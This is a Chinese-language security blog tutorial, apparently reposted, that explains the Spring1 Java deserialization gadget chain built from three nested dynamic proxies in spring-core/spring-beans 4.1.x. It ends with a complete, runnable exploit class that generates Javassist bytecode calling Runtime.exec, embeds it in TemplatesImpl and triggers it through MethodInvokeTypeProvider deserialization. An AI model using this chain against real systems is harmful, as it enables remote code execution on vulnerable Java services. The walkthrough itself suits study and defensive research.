本文主要是介绍【Web】浅聊Java反序列化之Spring1链——三层动态代理,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
目录
影响版本:
利用链
漏洞之sink:MethodInvokeTypeProvider#readObject
动态代理在反序列化中的应用
让provider.getType()返回一个动态代理对象——打破桎梏
桥梁——ObjectFactoryDelegatingInvocationHandler
小结
EXP
前文:【Java】Spring的ReflectionUtils类常用方法学习笔记-CSDN博客
【Java】关于动态代理的基础知识个人笔记-CSDN博客
影响版本:
jdk8u71之前
spring-core : 4.1.4.RELEASE
spring-beans : 4.1.4.RELEASE
利用链
/*Gadget chain:ObjectInputStream.readObject()SerializableTypeWrapper.MethodInvokeTypeProvider.readObject()SerializableTypeWrapper.TypeProvider(Proxy).getType()AnnotationInvocationHandler.invoke()HashMap.get()ReflectionUtils.findMethod()SerializableTypeWrapper.TypeProvider(Proxy).getType()AnnotationInvocationHandler.invoke()HashMap.get()ReflectionUtils.invokeMethod()Method.invoke()Templates(Proxy).newTransformer()AutowireUtils.ObjectFactoryDelegatingInvocationHandler.invoke()ObjectFactory(Proxy).getObject()AnnotationInvocationHandler.invoke()HashMap.get()Method.invoke()TemplatesImpl.newTransformer()TemplatesImpl.getTransletInstance()TemplatesImpl.defineTransletClasses()TemplatesImpl.TransletClassLoader.defineClass()Pwner*(Javassist-generated).<static init>Runtime.exec()*/漏洞之sink:MethodInvokeTypeProvider#readObject
先来看MethodInvokeTypeProvider的构造方法,要求传入provider,method和index
public MethodInvokeTypeProvider(TypeProvider provider, Method method, int index) {this.provider = provider;this.methodName = method.getName();this.index = index;this.result = ReflectionUtils.invokeMethod(method, provider.getType());}再来看 MethodInvokeTypeProvider#readObject
private void readObject(ObjectInputStream inputStream) throws IOException, ClassNotFoundException {inputStream.defaultReadObject();Method method = ReflectionUtils.findMethod(this.provider.getType().getClass(), this.methodName);this.result = ReflectionUtils.invokeMethod(method, this.provider.getType());}}这段代码调用了 ReflectionUtils,先是 findMethod 返回 Method 对象然后紧接着调用 invokeMethod 反射调用。注意,这里的调用是无参调用,对应的方法也是无参方法。
我们可以让this.methodName为newTransformer方法,并且让this.provider.getType()返回恶意TempletesImpl对象(其实并不是),从而调用TempletesImpl#newTransformer,触发类加载并执行任意代码(老面孔了,不作解释QWQ)
前者很好实现,直接传即可,后者则需要一番探讨。
动态代理在反序列化中的应用
我知道自己很啰嗦,但求求你先别急。
我们首先要有这样的两点朴素观念:
①类分两种,普通类主要负责实际的业务逻辑实现,调用了什么方法就实现什么逻辑;动态代理类主要负责在调用真实对象的方法前后,交由代理执行一些额外的逻辑
②InvocationHandler的invoke方法,不管外边执行什么方法,都会执行到invoke
下面聊聊动态代理在反序列化中的常见用法:
想象一个场景,我们的最终目的是调用Evil.func,
而入口类A入参是O,A中调用了非恶意的健康代码O.method,若O只是一个普通类,那么一切就很和谐地运行下去;若O是一个动态代理类,Evil类作为参数传入O,A中的O.method触发动态代理的invoke方法,invoke方法中调用了Evil.func,从而达成了我们的目的
让provider.getType()返回一个动态代理对象——打破桎梏
我们先来看看this.provider.getType()是何方神圣
interface TypeProvider extends Serializable {Type getType();Object getSource();}不用看具体实现就能发现getType方法明确了返回的对象类型是Type类型
OK回到正题
我们想控制this.provider.getType()的返回值,最好的方法便是对provider使用动态代理,当调用到getType时通过InvocationHandler的处理让目标返回TemplatesImpl。
我们知道在AnnotationInvocationHandler#invoke中,传入的member的属性值已经给定为'getType'的情况下,就可以通过控制memberValues属性值来控制返回的对象(具体实现就是往HashMap放k为'getType',v为TemplatesImpl),这是否可行呢?
class AnnotationInvocationHandler implements InvocationHandler, Serializable {private final Class<? extends Annotation> type;private final Map<String, Object> memberValues;AnnotationInvocationHandler(Class<? extends Annotation> type, Map<String, Object> memberValues) {Class<?>[] superInterfaces = type.getInterfaces();if (!type.isAnnotation() ||superInterfaces.length != 1 ||superInterfaces[0] != java.lang.annotation.Annotation.class)throw new AnnotationFormatError("Attempt to create proxy for a non-annotation type.");this.type = type;this.memberValues = memberValues;}public Object invoke(Object proxy, Method method, Object[] args) {String member = method.getName();Class<?>[] paramTypes = method.getParameterTypes();// Handle Object and Annotation methodsif (member.equals("equals") && paramTypes.length == 1 &¶mTypes[0] == Object.class)return equalsImpl(args[0]);if (paramTypes.length != 0)throw new AssertionError("Too many parameters for an annotation method");switch(member) {case "toString":return toStringImpl();case "hashCode":return hashCodeImpl();case "annotationType":return type;}// Handle annotation member accessorsObject result = memberValues.get(member);if (result == null)throw new IncompleteAnnotationException(type, member);if (result instanceof ExceptionProxy)throw ((ExceptionProxy) result).generateException();if (result.getClass().isArray() && Array.getLength(result) != 0)result = cloneArray(result);return result;}
}很遗憾,并不行,因为上面也提到getType方法返回的对象类型是Type类型,若直接返回TemplatesImpl类型会类型转换错误而失败。
而我们需要的是返回值是 Type 类型又是 Templates 类型的类,如果是具体类,那条件未免有些苛刻,显然,其只能是个动态代理类
到这一步,我们已经确定了反序列化的入口是MethodInvokeTypeProvider,它的provider是用了AnnotationInvocationHandler作为handler的类型为typeProvider的动态代理类,并且其provider.getType()返回值是个既是Type 类型又是Templates 类型的动态代理类。
桥梁——ObjectFactoryDelegatingInvocationHandler
首先要清楚,这一长串玩意,本质上还是InvocationHandler,是给我们创建动态代理用的
and别忘了我们的目的是获取一个返回值是 Type 类型又是 Templates 类型的动态代理类传给AnnotationInvocationHandler
而这个动态代理类用的handler就是ObjectFactoryDelegatingInvocationHandler
它的构造方法接收一个ObjectFactory参数
public ObjectFactoryDelegatingInvocationHandler(ObjectFactory<?> objectFactory) {this.objectFactory = objectFactory;}OK打住,我们再看下ObjectFactoryDelegatingInvocationHandler#invoke
public Object invoke(Object proxy, Method method, Object[] args) throws Throwable {String methodName = method.getName();if (methodName.equals("equals")) {return proxy == args[0];} else if (methodName.equals("hashCode")) {return System.identityHashCode(proxy);} else if (methodName.equals("toString")) {return this.objectFactory.toString();} else {try {return method.invoke(this.objectFactory.getObject(), args);} catch (InvocationTargetException var6) {throw var6.getTargetException();}}}}太优雅了,其对this.objectFactory.getObject()进行传入的method的反射方法调用,而getObject()返回值是一个泛型!
public interface ObjectFactory<T> {T getObject() throws BeansException;
}
那只要我们能控制this.objectFactory.getObject()的返回结果为构造好的TemplateImpl对象即可,这样就可以配合传入的method(newTransformer)完成利用链的调用。
为了实现这个效果,这里我们又要套一层类型是ObjectFactory.class的代理类,并作为ObjectFactory参数传入DelegatingInvocationHandler
所以我们要创建objectFactory的动态代理并且让Handler为AnnocationInvocationHandler,并且设置memberValue属性中getObject为key,value为TemplatesImpl对象。(道理在上面讲过了,不作赘述)
至于返回值既是 Type 类型又是 Templates 类型要怎么实现呢
我们只要在创建代理时指定就好(啰嗦一嘴)
Class<?> clazz2 = Class.forName("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler");Constructor<?> con2 = clazz2.getDeclaredConstructors()[0];con2.setAccessible(true);InvocationHandler ofdHandler = (InvocationHandler) con2.newInstance(factory);Type typeTemplateProxy = (Type) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),new Class[]{Type.class, Templates.class}, ofdHandler);小结
这条链共计用了三次动态代理,用了两次AnnotationInvocationHandler实现动态代理来修改方法的返回值,两个动态代理之间是通过ObjectFactoryDelegatingInvocationHandler实现动态代理作为桥梁连接起来的。
EXP
我复现用的是jdk8u20(
pom依赖
<dependencies><!-- https://mvnrepository.com/artifact/org.springframework/spring-core --><dependency><groupId>org.springframework</groupId><artifactId>spring-core</artifactId><version>4.1.1.RELEASE</version></dependency><!-- https://mvnrepository.com/artifact/org.springframework/spring-beans --><dependency><groupId>org.springframework</groupId><artifactId>spring-beans</artifactId><version>4.1.1.RELEASE</version></dependency><dependency><groupId>org.javassist</groupId><artifactId>javassist</artifactId><version>3.29.2-GA</version></dependency></dependencies>召唤计算器的神奇咒语
package com.spring;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import org.springframework.beans.factory.ObjectFactory;import javax.xml.transform.Templates;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Target;
import java.lang.reflect.*;
import java.util.HashMap;public class Spring1 {public static void main(String[] args) throws Exception {TemplatesImpl templates = TemplatesImpl.class.newInstance();setValue(templates, "_bytecodes", new byte[][]{genPayload("calc")});setValue(templates, "_name", "1");Class<?> clazz1 = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");Constructor<?> con1 = clazz1.getDeclaredConstructors()[0];con1.setAccessible(true);HashMap<String, Object> map1 = new HashMap<String, Object>();map1.put("getObject", templates);InvocationHandler invocationHandler1 = (InvocationHandler) con1.newInstance(Target.class, map1);ObjectFactory<?> factory = (ObjectFactory<?>) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(), new Class[]{ObjectFactory.class}, invocationHandler1);Class<?> clazz2 = Class.forName("org.springframework.beans.factory.support.AutowireUtils$ObjectFactoryDelegatingInvocationHandler");Constructor<?> con2 = clazz2.getDeclaredConstructors()[0];con2.setAccessible(true);InvocationHandler ofdHandler = (InvocationHandler) con2.newInstance(factory);Type typeTemplateProxy = (Type) Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),new Class[]{Type.class, Templates.class}, ofdHandler);HashMap<String, Object> map2 = new HashMap<String, Object>();map2.put("getType", typeTemplateProxy);InvocationHandler invocationHandler2 = (InvocationHandler) con1.newInstance(Target.class, map2);Class<?> typeProviderClass = Class.forName("org.springframework.core.SerializableTypeWrapper$TypeProvider");Object typeProviderProxy = Proxy.newProxyInstance(ClassLoader.getSystemClassLoader(),new Class[]{typeProviderClass}, invocationHandler2);Class<?> clazz3 = Class.forName("org.springframework.core.SerializableTypeWrapper$MethodInvokeTypeProvider");Constructor<?> con3 = clazz3.getDeclaredConstructors()[0];con3.setAccessible(true);Object o = con3.newInstance(typeProviderProxy, Object.class.getMethod("toString"), 0);setValue(o, "methodName", "newTransformer");ser(o);}public static void ser(Object o) throws Exception {ByteArrayOutputStream baos = new ByteArrayOutputStream();ObjectOutputStream oos = new ObjectOutputStream(baos);oos.writeObject(o);oos.close();ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(baos.toByteArray()));ois.readObject();}public static byte[] genPayload(String cmd) throws Exception {ClassPool pool = ClassPool.getDefault();CtClass clazz = pool.makeClass("a");CtClass superClass = pool.get(AbstractTranslet.class.getName());clazz.setSuperclass(superClass);CtConstructor constructor = new CtConstructor(new CtClass[]{}, clazz);constructor.setBody("Runtime.getRuntime().exec(\"" + cmd + "\");");clazz.addConstructor(constructor);clazz.getClassFile().setMajorVersion(49);return clazz.toBytecode();}public static void setValue(Object obj, String name, Object value) throws Exception {Field field = obj.getClass().getDeclaredField(name);field.setAccessible(true);field.set(obj, value);}
}这篇关于【Web】浅聊Java反序列化之Spring1链——三层动态代理的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
